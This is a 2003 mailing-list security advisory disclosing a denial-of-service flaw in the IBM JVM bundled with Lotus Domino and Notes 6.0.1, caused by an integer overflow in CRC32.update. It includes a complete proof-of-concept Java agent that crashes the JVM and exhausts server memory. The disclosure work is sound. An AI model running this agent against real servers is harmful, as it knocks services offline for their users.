-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1 and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory is not freed and causes the server machine (observed on MS XP) to deny further service. IMPLICATIONS - - If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable, - - if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable. ANALYSIS: The call to the "update" method of the CRC32 raises an integer overflow in the java java.util.zip.* core libraries which triggers a jni routine that cannot handle the extreme high input value. HISTORY: This vulnerability has already been detected in the Sun JDK (http://developer.java.sun.com/developer/bugParade/bugs/4811913.html), and was disclosed at Blackhat Windows 2003. The background of this bugs is described at www.illegalaccess.org Sincerely Marc Schoenefeld =========================Agent Source Code=========================== import lotus.domino.*; import java.util.zip.*; public class JavaAgent extends AgentBase { public void NotesMain() { try { Session session = getSession(); AgentContext agentContext = session.getAgentContext(); CRC32 crc32 = new CRC32(); crc32.update(new byte[0], 4, 0x7ffffffc); // (Your code goes here) } catch(Exception e) { e.printStackTrace(); } } } =========================Agent Source Code=========================== - -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (AIX) Comment: For info see http://www.gnupg.org iD8DBQE+j09FqCaQvrKNUNQRAs9uAJ4unAFEKqqRuk4gBlkNSKQ5rTMa0wCfVzC+ iJHcqblX8QE7UaPofUrKU3Y= =l93r -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Mon Apr 07 2003 - 09:31:26 PDT